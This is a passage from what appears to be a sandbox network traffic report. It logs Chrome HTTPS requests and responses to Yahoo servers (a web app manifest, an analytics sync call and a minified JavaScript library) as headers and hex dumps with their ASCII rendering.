                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: eps:#7dcbff;--playdoh:#21d87d;--ramones:#2c363f;--sapphire:#2f0060;--scooter:#0063eb;--sea-foam:#11d3cd;--shark:#828a93;--sky:#12a9ff;--smurfette:#188fff;--solo-cup:#eb0f29;--spirulina:#009c94;--starfish:#7759ff;--swedish-fish:#ff333a;--thanos:#907cff;--t


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    137192.168.2.44989887.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC534OUTGET /manifest_desktop_us.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC881INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: kZFB3pYw0fQs1h+s6WfC/acFeOVPXSaBgAgljRfHTYSX9yimdGrrfmXyoRC5oOQLRKuf7EvmmwNNwYl8AYkS7NLAhzxcnuuehSvR6FbvfFo=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: WXMNA7QXXR1G4XAH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 07:38:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 05 Sep 2024 07:54:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: max-age=259200, public
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: jLngIqgQRWInvwPv1EyGjPzqBJsBnmTp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 2146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "9faf9f0af03805fd10e24fd7a54ca611"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 34939
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC1300INData Raw: 7b 0a 20 20 20 20 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 20 22 23 66 66 66 66 66 66 22 2c 0a 20 20 20 20 22 64 69 73 70 6c 61 79 22 3a 20 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 0a 20 20 20 20 22 67 63 6d 5f 75 73 65 72 5f 76 69 73 69 62 6c 65 5f 6f 6e 6c 79 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 69 63 6f 6e 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 34 38 78 34 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 30 39 30 36 32 30 31 38 2f 6d 61 6e 69 66 65 73 74 2f 79 61 68 6f 6f 5f 69 6e 73 74 61 6c 6c 5f 34 38 2e 70 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: { "background_color": "#ffffff", "display": "standalone", "gcm_user_visible_only": true, "icons": [ { "sizes": "48x48", "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_48.png",
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC846INData Raw: 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 33 38 34 78 33 38 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 30 39 30 36 32 30 31 38 2f 6d 61 6e 69 66 65 73 74 2f 79 61 68 6f 6f 5f 69 6e 73 74 61 6c 6c 5f 33 38 34 2e 70 6e 67 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 7a 65 73 22 3a 20 22 35 31 32 78 35 31 32 22 2c 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: "type": "image/png" }, { "sizes": "384x384", "src": "https://s.yimg.com/cv/apiv2/09062018/manifest/yahoo_install_384.png", "type": "image/png" }, { "sizes": "512x512",


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    138192.168.2.4499123.75.62.374434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC857OUTGET /ups/58784/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: ups.analytics.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; IDSYNC=19cw~2kzt; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC433INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: IDSYNC=19cw~2kzt;Version=1;Domain=.analytics.yahoo.com;Path=/;Max-Age=31536000;Expires=Tue, 30-Sep-2025 17:21:05 GMT;Secure;SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS/9.1.10.137
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC4INData Raw: 33 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC48INData Raw: 7b 22 61 78 69 64 22 3a 20 22 79 2d 50 4d 4f 70 33 74 68 45 32 75 4c 68 79 79 38 51 46 42 6b 41 4b 47 71 4e 67 4c 76 7a 6e 65 47 34 7e 41 22 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"axid": "y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC3INData Raw: 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    139192.168.2.44991087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:04 UTC366OUTGET /aaq/wf/wf-fetch-1.19.1-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: f9BnSDZ71AeyVCNYiIymFhbiRZgoj0xRONuKbBw2LoIxlmQZwnTZXUSl9AV25i7ENxCfWbn4BwI=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 1T9DT57WD81ZR4M2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Sat, 28 Sep 2024 22:46:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 20 Oct 2023 09:18:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "f085d6c42acb1394e457e463230de8ba"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: XcyEKreDz4JYLdlgGq65LAHV5Dsub3V6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 16798
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 153293
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 66 65 74 63 68 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 66 65 74 63 68 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-fetch",[],t):"object"==typeof exports?exports["wafer-fetch"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ction"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Objec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 6c 6c 79 7b 69 66 28 69 29 74 68 72 6f 77 20 61 7d 7d 72 65 74 75 72 6e 20 72 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 29 29 72 65 74 75 72 6e 20 74 3b 69 66 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 6e 20 4f 62 6a 65 63 74 28 74 29 29 72 65 74 75 72 6e 20 65 28 74 2c 72 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: lly{if(i)throw a}}return r}return function(t,r){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t))return e(t,r);throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),h=function(){function e(e,t){for(var r=0;r<t.length;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 2e 75 72 6c 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 75 72 6c 22 29 2c 68 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 62 6f 75 6e 64 61 72 79 22 29 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 22 29 2c 79 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 72 65 64 65 6e 74 69 61 6c 73 22 29 2c 76 3d 63 2e 5f 75 74 69 6c 2e 63 61 63 68 65 4b 65 79 7c 7c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 6b 65 79 22 29 2c 6d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 73 74 72 61 74 65 67 79 22 29 7c 7c 22 6e 65 74 77 6f 72 6b 46 69 72 73 74 22 2c 70 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 62 2b 22 63 61 63 68 65 2d 74 74 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: .url||e.getAttribute(b+"url"),h=e.getAttribute(b+"boundary"),d=e.getAttribute(b+"cache"),y=e.getAttribute(b+"credentials"),v=c._util.cacheKey||e.getAttribute(b+"cache-key"),m=e.getAttribute(b+"cache-strategy")||"networkFirst",p=e.getAttribute(b+"cache-ttl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 2c 56 3d 6e 75 6c 6c 29 2c 22 73 74 61 74 65 43 68 61 6e 67 65 22 21 3d 3d 58 7c 7c 48 7c 7c 28 48 3d 30 29 2c 30 21 3d 3d 59 29 73 77 69 74 63 68 28 58 29 7b 63 61 73 65 22 69 6e 74 65 72 76 61 6c 22 3a 63 61 73 65 22 6f 6e 4c 6f 61 64 22 3a 63 61 73 65 22 73 74 61 74 65 43 68 61 6e 67 65 22 3a 63 61 73 65 22 76 69 65 77 70 6f 72 74 22 3a 59 3d 32 7d 69 66 28 22 61 63 74 69 76 61 74 65 22 21 3d 3d 58 26 26 22 65 61 63 68 43 6c 69 63 6b 22 21 3d 3d 58 26 26 22 69 6e 74 65 72 76 61 6c 22 21 3d 3d 58 26 26 22 73 74 61 74 65 43 68 61 6e 67 65 22 21 3d 3d 58 26 26 22 74 61 62 41 63 74 69 76 61 74 65 22 21 3d 3d 58 7c 7c 28 7a 3d 21 30 29 2c 21 4b 29 7b 76 61 72 20 4a 3d 5f 28 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 66 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ,V=null),"stateChange"!==X||H||(H=0),0!==Y)switch(X){case"interval":case"onLoad":case"stateChange":case"viewport":Y=2}if("activate"!==X&&"eachClick"!==X&&"interval"!==X&&"stateChange"!==X&&"tabActivate"!==X||(z=!0),!K){var J=_(e.getElementsByClassName("fe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 6f 75 73 65 65 6e 74 65 72 22 3d 3d 3d 58 3f 28 63 2e 5f 75 74 69 6c 2e 68 61 73 4d 6f 75 73 65 65 6e 74 65 72 3d 21 30 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 29 3a 22 74 61 62 41 63 74 69 76 61 74 65 22 3d 3d 3d 58 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 77 66 2d 74 72 69 67 67 65 72 2d 61 63 74 69 76 61 74 65 64 22 29 26 26 21 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 3f 63 2e 66 65 74 63 68 28 29 3a 22 6f 6e 4c 6f 61 64 22 3d 3d 3d 58 26 26 63 2e 66 65 74 63 68 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 63 2e 64 65 73 74 72 6f 79 28 29 7d 29 2c 63 7d 72 65 74 75 72 6e 20 6f 28 74 2c 65 29 2c 68 28 74 2c 5b 7b 6b 65 79 3a 22 66 65 74 63 68 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ouseenter"===X?(c._util.hasMouseenter=!0,c.addEventListeners()):"tabActivate"===X&&e.classList.contains("wf-trigger-activated")&&!e.classList.contains(s)?c.fetch():"onLoad"===X&&c.fetch().then(function(e){e&&c.destroy()}),c}return o(t,e),h(t,[{key:"fetchD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:05 UTC1300INData Raw: 73 2e 5f 75 74 69 6c 2e 74 61 72 67 65 74 45 6c 65 6d 7d 7d 2c 7b 6b 65 79 3a 22 66 65 74 63 68 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 7b 7d 2c 72 3d 74 2e 64 69 73 61 62 6c 65 2c 69 3d 76 6f 69 64 20 30 3d 3d 3d 72 7c 7c 72 2c 61 3d 74 2e 63 75 72 72 65 6e 74 53 65 73 73 69 6f 6e 52 65 74 72 79 43 6f 75 6e 74 2c 6f 3d 76 6f 69 64 20 30 3d 3d 3d 61 3f 30 3a 61 2c 73 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 63 3d 73 2e 65 6c 65 6d 2c 75 3d 73 2e 73 68 6f 75 6c 64 41 6c 77 61 79 73 54 72 69 67 67 65 72 2c 6c 3d 73 2e 73 75 63 63 65 73 73 43 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s._util.targetElem}},{key:"fetch",value:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},r=t.disable,i=void 0===r||r,a=t.currentSessionRetryCount,o=void 0===a?0:a,s=this._util,c=s.elem,u=s.shouldAlwaysTrigger,l=s.successCl
